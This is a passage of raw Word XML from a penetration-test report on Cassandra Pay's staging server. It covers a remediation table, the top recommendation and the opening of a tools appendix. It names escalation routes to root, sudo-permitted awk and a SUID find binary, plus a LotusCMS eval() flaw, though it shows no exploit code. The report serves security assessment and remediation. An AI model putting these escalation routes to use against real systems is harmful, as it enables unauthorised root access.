    </w:p>
    <w:p w14:paraId="24B6121F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>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
        <w:gridCol w:w="3300"/>
        <w:gridCol w:w="800"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="2526"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="712AEB64" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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77E1EE0C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="33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31764ACE" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Recommendation (summary)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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222091D6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Closes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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56877FC7" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Sev.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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273DE89C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="25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0D11710E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="7C2A39EA" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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6955C35" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>1</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7AFF20E9" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Remove the sudo NOPASSWD rule on /usr/bin/awk; replace with narrow wrapper.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89E8BAC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F1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5611714" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Critical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8BF530D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Low</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EE1EC12" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>System Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="0AE640C8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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AFCBBDE" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="33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CC02936" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Reject vendor VM until LotusCMS is removed or eval() path is patched.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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2F9D64F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F2</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59F586F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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D107BF6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Medium</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C704A7B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Procurement + Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="1423826F" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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E4FE1F1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>3</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99BB79D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Remove /usr/local/bin/find SUID; mount /tmp and /var/tmp with nosuid.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5DFCC71" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F3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75B2CCAF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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7635A45" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Low</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98AFD47" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>System Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="783B312A" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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314F968B" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="33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54F3181" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Externalise DB credentials from gconfig.php to environment / secret manager.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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A2B07FD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F4</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3FDE64DA" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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1CFE745" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Medium</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2FE8275F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Vendor (mandatory) + DevOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="41BD6866" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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1DA074E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>5</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7456F627" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Migrate password storage to Argon2id (m=64MiB, t=3, p=2).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72E268F" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>F5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08A2778" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>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F191988" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>High</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0F568AC" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Vendor (mandatory) + Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="713B0623" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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1A5AE9B3" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="33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2CC426EF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Deploy auditd rules for setuid execve from auid&gt;=1000; alert via SIEM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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C166D6C" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>—</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370B6D5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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1622C0C1" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Medium</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E496881" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>SOC + Security Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00674E6D" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC8AD6D" w14:textId="77777777" w:rsidR="00C23662" w:rsidRDefault="00C23662">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc229906607"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="163859AE" w14:textId="2C3FFC8E" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.2  The single most critical recommendation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>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57A4" w14:paraId="6227A175" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9026" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="2E75B6"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E75B6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="280" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="280" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0AD536E4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Recommendation #1 — Remove the sudo NOPASSWD: /usr/bin/awk rule.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30A78008" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="000E57A4">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="24E78F93" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Why this is the priority. If Cassandra Pay implements only this single recommendation and none of the others, the time-to-root on cassandra-stg-01 from an initial msfadmin shell increases from approximately ten seconds (the current state via F1) to approximately seven minutes (via F3, which requires identifying /usr/local/bin/find among 24 standard SUID files and then running it correctly). The change does not eliminate root escalation, but it removes the lazy-attacker path. In practice, the difference between "ten seconds" and "seven minutes" is the difference between an automated exploitation script that succeeds before any monitoring noticed it and a hands-on-keyboard attack that has time to trigger volumetric alerts from the existing intrusion-detection infrastructure.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="627BD032" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="000E57A4">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="42EEE72E" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>The cost to the business. The change is a single line removal in /etc/sudoers, verified with `visudo -c`, taking under 30 minutes including the change window. The only operational impact is on whatever automation originally motivated the rule — likely a log-parsing cron job. The fix for that automation is to wrap awk in a narrow script (/usr/local/sbin/log-parse.sh) with hard-coded arguments, and to add an exact-path sudoers entry pointing to that wrapper. The wrapper is approximately fifteen lines of bash, takes one to two hours to write, test, and deploy through Cassandra Pay's normal change-management process, and produces a sudoers configuration that is auditable by future reviewers. There are no licensing costs, no infrastructure changes, no user-visible workflow impacts, and no required training. Compared to Recommendation #2 (which depends on the vendor relationship and may take weeks to negotiate), Recommendation #1 is the most effective lever Cassandra Pay can pull this week.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2569E5DD" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA41963" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc229906608"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6. Appendices</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="346EDD75" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc229906609"/>
      <w:r>
        <w:t>Appendix A — Tools used during the engagement</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600"/>
        <w:gridCol w:w="5526"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E57A4" w14:paraId="5566A547" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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1C3299F6" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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5C493EA5" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="55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00F51657" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
              </w:rPr>
              <w:t>Purpose during this engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E57A4" w14:paraId="72D8F6BC" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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DDF6BEF" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>Nmap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F3C9EA4" w14:textId="77777777" w:rsidR="000E57A4" w:rsidRDefault="00000000">
            <w:pPr>
